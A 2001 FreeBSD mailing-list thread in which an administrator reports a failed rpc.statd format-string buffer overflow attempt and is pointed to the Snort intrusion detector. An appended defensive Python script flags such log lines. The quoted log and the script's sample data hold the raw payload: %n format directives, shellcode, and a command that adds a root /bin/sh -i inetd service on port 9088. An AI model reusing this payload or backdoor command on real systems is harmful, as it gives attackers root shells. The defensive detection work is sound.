Date: Thu, 4 Jan 2001 10:16:31 -0600
From: Eric_Stanfield@kenokozie.com
To: Guy Helmer <ghelmer@palisadesys.com>
Cc: freebsd-questions@FreeBSD.ORG
Subject: Re: hack attempt (again) - help
Message-ID: <OFBA7E069E.3E8C41C0-ON862569CA.00595399@kka.com>
Snort compiled, configured and running in less than 10 minutes. The
ruleset looks very good for my purposes. Thanks for the tip, this is a
good find.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Eric Stanfield, K2Access
Keno Kozie and Associates
222 N LaSalle #1500
Chicago, IL 60606
(312) 332-3000
Guy Helmer <ghelmer@palisadesys.com>
01/04/01 09:26 AM
    To: Eric_Stanfield@kenokozie.com
    cc: freebsd-questions@FreeBSD.ORG
    Subject: Re: hack attempt (again) - help
On Thu, 4 Jan 2001 Eric_Stanfield@kenokozie.com wrote:
> Alright this jerkoff has once again attempted to hack one of my freebsd
> machines by trying what I assume is a buffer overflow to rpc:
>
> Jan 3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon:
> ^D=F7=FF=BF^D=F7=FF=BF^E=F7=FF=BF^E=F7=FF=BF^F=F7=FF=BF^F=F7=FF=BF^G=F7=FF=BF^G=F7=FF=BF%08x %08x %08x %08x %08x %08x %08x
> %08x %08x %08x %08x %08x %08x %08x
>
> %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P=EBK^M-
>
> v=ACM-^C=EE M-^M^(M-^C=C6 M- ^=B0M-^C=EE M-^M^.M-^C=C6 M-^C=C3 M-^C=EB#M- ^=B41=C0M-^C=EE
> M-^HF'M-^HF*M-^C=C6 M-^HF=ABM- F=B8=B0+, M- =F3M-^MN=ACM-^MV=B8=CDM-^@1=DBM-
> =D8@=CDM-^@=E8=B0=FF=FF=FF/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >>
> /tmp/m; /usr/sbin/inetd /tmp/m;
>
> The interesting bit is what he (she?) is attempting to sneak in at the end
> of the garbage sent to the port.
>
> I've given the system a thorough check and this seems to have been a second
> failed attempt. I'm now annoyed, however, and would like to be able to at
> least log what address this stuff is originating from. Can anyone suggest
> something from the ports that would do the trick? I've disabled nfs/rpc
> but I'm sure the hacker will come knocking again.
Snort with a current copy of the rule set from
http://www.whitehats.com/ids/index.html ought to detect this (and lots of
other script kiddie attempts).
Guy
--
Guy Helmer, Ph.D.
Sr. Software Engineer, Palisade Systems ---
ghelmer@palisadesys.com
http://www.palisadesys.com/~ghelmer
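A small host-side triage script, added here as an illustration and not part of the thread or of Snort: it scans syslog text for the rpc.statd "Invalid hostname to sm_mon" entry quoted above, rates each hit by the printf directives found in the hostname argument (%n is the write primitive that turns a probe into an exploit attempt), and pulls out any shell command appended to the payload. The log lines are constructed; note that the syslog entry carries no peer address, which is why the reply points at a network sensor such as Snort.

```python
import re

# Constructed sample syslog lines (not from a real system). The second one
# mimics the rpc.statd entry quoted in the thread: printf conversions written
# into the "hostname" argument, with a shell command appended to the payload.
SAMPLE_LOG = """\
Jan  3 23:18:01 mrtg rpc.statd: Invalid hostname to sm_mon: fileserver.example.invalid
Jan  3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon: %08x %08x %08x %08x %0242x%n%055x%n/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd /tmp/m;
Jan  3 23:20:10 mrtg sshd[123]: Accepted publickey for ops from 192.0.2.10 port 4022
"""

STATD_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"rpc\.statd: Invalid hostname to sm_mon: (?P<arg>.*)$"
)
WRITE_DIRECTIVE = re.compile(r"%\d*n")   # %n writes to memory: the dangerous one
READ_DIRECTIVE = re.compile(r"%\d*x")    # %08x runs walk the stack (stack leak)
SHELL_CMD = re.compile(r"/bin/sh\b.*$")  # command smuggled in after the shellcode


def classify(line):
    """Return a dict describing a suspicious rpc.statd line, or None if benign."""
    m = STATD_LINE.match(line)
    if not m:
        return None
    arg = m.group("arg")
    writes = len(WRITE_DIRECTIVE.findall(arg))
    reads = len(READ_DIRECTIVE.findall(arg))
    # A real hostname never contains printf conversions; a few stray %x are
    # treated as a probe, any %n as an exploit attempt.
    if writes == 0 and reads < 4:
        return None
    cmd = SHELL_CMD.search(arg)
    return {
        "timestamp": m.group("ts"),
        "host": m.group("host"),
        "n_writes": writes,
        "n_reads": reads,
        "severity": "exploit-attempt" if writes else "probe",
        "embedded_command": cmd.group(0) if cmd else None,
    }


def scan(text):
    """Run classify() over every line of a syslog extract and keep the hits."""
    return [hit for hit in (classify(ln) for ln in text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```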
